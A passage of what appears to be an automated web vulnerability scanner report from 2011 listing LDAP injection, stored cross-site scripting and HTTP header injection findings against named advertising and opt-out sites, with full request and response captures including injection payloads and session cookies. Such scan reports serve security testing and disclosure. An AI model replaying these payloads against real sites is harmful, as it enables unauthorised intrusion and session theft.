Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response 1

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c775130afbcbeffd)(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:15 GMT
Server: QS

Request 2

GET /optout_set?s=nai&nocache=c775130afbcbeffd)!(sn=* HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response 2

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c775130afbcbeffd)!(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:15 GMT
Server: QS

3.7. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkadvertising.org
Path:	/managing/optout_results.asp

Issue detail

The optThis parameter appears to be vulnerable to LDAP injection attacks.

The payloads a0295734fc242a2c)(sn=* and a0295734fc242a2c)!(sn=* were each submitted in the optThis parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
s=24&optThis=25&optThis=26&optThis=27&optThis=28&optThis=29&optThis=30&optThis=31&optThis=32&optThis=33&optThis=34&optThis=35&optThis=36&optThis=37&optThis=38&optThis=39&optThis=40&optThis=41&optThis=a0295734fc242a2c)(sn=*&optThis=43&optThis=44&optThis=45&optThis=46&optThis=47&optThis=48&optThis=49&optThis=50&optThis=51&optThis=52&optThis=53&optThis=54&optThis=55&optThis=56&optThis=57&optThis=58&optThis=59&optThis=60&o
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:28:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:28:32 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.2977564 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.2148968 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.994634 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.3898432 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.2042155 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
s=24&optThis=25&optThis=26&optThis=27&optThis=28&optThis=29&optThis=30&optThis=31&optThis=32&optThis=33&optThis=34&optThis=35&optThis=36&optThis=37&optThis=38&optThis=39&optThis=40&optThis=41&optThis=a0295734fc242a2c)!(sn=*&optThis=43&optThis=44&optThis=45&optThis=46&optThis=47&optThis=48&optThis=49&optThis=50&optThis=51&optThis=52&optThis=53&optThis=54&optThis=55&optThis=56&optThis=57&optThis=58&optThis=59&optThis=60&o
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:28:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:28:32 GMT
Cache-control: no-cache

<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>

       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">

<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.1614038 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=7.854426E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.8582814 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.2534907 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br> </td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=6.786293E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clic
...[SNIP]...

4. Cross-site scripting (stored) previous next
There are 2 instances of this issue:

/bar/v16-504/d8/jsc/fm.js [$ parameter]
/bar/v16-504/d8/jsc/fm.js [$ parameter]

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/d8/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-504/d8/jsc/fm.js. The payload 5da07'-alert(1)-'6ad983039ac was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/d8/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request 1

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=5da07'-alert(1)-'6ad983039ac&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Request 2

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=29:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=171
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:47 GMT
Content-Length: 4639
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';z="+Math.random();}

if(zzuid=='unkn
...[SNIP]...

4.2. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/d8/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-504/d8/jsc/fm.js. The payload 3bfed"-alert(1)-"cbdca187d51 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/d8/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request 1

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=3bfed"-alert(1)-"cbdca187d51&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Request 2

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=21:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=172
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:46 GMT
Content-Length: 4661
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

...[SNIP]...

5. HTTP header injection previous next
There are 21 instances of this issue:

http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.masslive.com/RealMedia/ads/adstream.cap [va parameter]
http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.mlive.com/RealMedia/ads/adstream.cap [va parameter]
http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]
http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]
http://d7.zedo.com/utils/ecSet.js [v parameter]
http://dp.33across.com/ps/ [33x_ps cookie]
http://login.dotomi.com/ucm/UCMController [redir_url parameter]
http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [REST URL parameter 2]
http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]
http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [dv parameter]
http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [REST URL parameter 4]
http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]
http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [va parameter]
http://optout.crwdcntrl.net/optout [ct parameter]
http://optout.crwdcntrl.net/optout [d parameter]
http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]
http://t.mookie1.com/t/v1/event [migDest parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

5.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.masslive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 64faf%0d%0ac9ed964d708 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=64faf%0d%0ac9ed964d708&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:01:56 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 64faf
c9ed964d708=1; expires=Tue, 04-Oct-11 04:01:56 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:56 GMT;path=/;httponly

5.2. http://ads.masslive.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.masslive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload c8998%0d%0a6cd6f44de8f was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=c8998%0d%0a6cd6f44de8f&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:57 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=c8998
6cd6f44de8f; expires=Tue, 04-Oct-11 04:02:57 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:57 GMT;path=/;httponly

5.3. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.mlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload a5e27%0d%0a56b30a2b4ac was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=a5e27%0d%0a56b30a2b4ac&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:07 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: a5e27
56b30a2b4ac=1; expires=Tue, 04-Oct-11 04:02:07 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:07 GMT;path=/;httponly

5.4. http://ads.mlive.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.mlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 4239b%0d%0a9a751c9a568 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=4239b%0d%0a9a751c9a568&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:03:08 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=4239b
9a751c9a568; expires=Tue, 04-Oct-11 04:03:08 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:13:08 GMT;path=/;httponly

5.5. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e8c13%0d%0ab3daaf667e6 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=e8c13%0d%0ab3daaf667e6&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:49 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e8c13
b3daaf667e6=1; expires=Tue, 04-Oct-11 04:00:49 GMT; path=/; domain=.oregonlive.com
